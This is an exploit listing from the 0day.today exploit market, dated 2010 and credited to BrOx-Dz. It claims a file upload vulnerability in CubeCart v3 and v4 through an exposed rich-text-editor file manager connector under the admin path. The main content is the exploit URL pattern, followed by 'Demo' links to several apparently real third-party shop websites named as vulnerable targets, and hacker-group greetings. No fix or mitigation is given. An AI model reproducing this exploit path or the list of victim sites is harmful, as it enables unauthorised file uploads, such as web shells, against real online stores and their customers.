[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CubeCart v3 and v4 File Upload Vulnerability

Author
BrOx-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14379
Category
web applications
Date add
08-10-2010
Platform
php
==============================================
CubeCart v3 and  v4  File Upload Vulnerability
==============================================

####################################################################
# Exploit Title: CubeCart File Upload Vulnerability
# Date: 07-10-2010
# Author: BrOx-Dz
# email : E.dz@hotmail.fr
# Software Link: http://www.cubecart.com/downloads/
# Version: v3 v4
# Tested on: windows xp pack 3 linux ubuntu 10
# home  : algerie -- wilaya ouargla
 
####################################################################

===[  Vulnerable File ]===

/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

 
===[ Exploit ]===
 
www.site.com/[path]/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php
 
===[ Demo ]===
 
http://www.dsone.fr/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

http://www.am-tex.fr/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

http://www.dsone.fr/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

http://www.agnesandhoss.com/admin/includes/rte/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php
 
####################################################################

greetz : lagripe-dz  mca_crb artin hassani ma3go  jhacker all dz members

www.sec4ever.com  www.v4-team.com  www.p0c.com www.vbspiders.com  www.h4kz.net 



#  0day.today [2024-07-02]  #